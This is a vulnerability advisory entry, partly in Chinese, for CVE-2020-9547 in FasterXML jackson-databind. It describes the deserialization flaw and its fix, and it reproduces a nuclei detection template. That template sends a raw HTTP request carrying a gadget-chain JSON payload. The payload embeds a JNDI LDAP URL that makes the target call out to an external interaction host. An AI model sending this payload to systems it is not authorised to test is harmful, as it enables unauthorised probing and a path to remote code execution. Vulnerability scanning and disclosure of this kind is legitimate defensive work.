FasterXML jackson-databind Deserialization Remote Code Execution Vulnerability

漏洞信息

漏洞名称： FasterXML jackson-databind Deserialization Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2020-9547

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： FasterXML jackson-databind是一个广泛使用的Java库，用于将Java对象序列化为JSON和反序列化JSON为Java对象。它广泛应用于各种Java应用程序中，特别是在处理RESTful API和微服务架构时。此漏洞影响2.x版本，直到2.9.10.4。漏洞的核心问题在于jackson-databind在处理序列化小工具和类型交互时的缺陷，特别是与com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig（即ibatis-sqlmap）相关的部分。当启用了多态类型处理（@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS）时，攻击者可以通过反序列化不可信的数据来执行任意代码。这意味着，如果应用程序接收并反序列化了恶意的JSON数据，攻击者可以利用此漏洞在目标系统上执行任意命令，导致严重的安全风险，如数据泄露、服务中断或进一步的系统入侵。此漏洞的利用不需要用户认证，且可以远程触发，因此被评级为严重级别。为了缓解此漏洞，建议将jackson-databind更新到2.9.10.4或更高版本，或者禁用多态类型处理，并实施适当的输入验证和反序列化控制措施。

产品厂商： fasterxml

产品名称： jackson-databind

影响版本： 2.x before 2.9.10.4

搜索语法： cpe:”cpe:2.3:o:debian:debian_linux”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/ec7905f4e4d837c81e202a1e7c1c2ce715144335/http%2Fcves%2F2020%2FCVE-2020-9547.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization Remote Code Execution
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["java.util.Properties",{"UserTransaction":"{{payload_jndi_ldap}}"}]}]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "contains_any(content_type, 'application/json', 'text/plain')"
          - "status_code == 200 || status_code == 400 || status_code == 500"
        condition: and

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or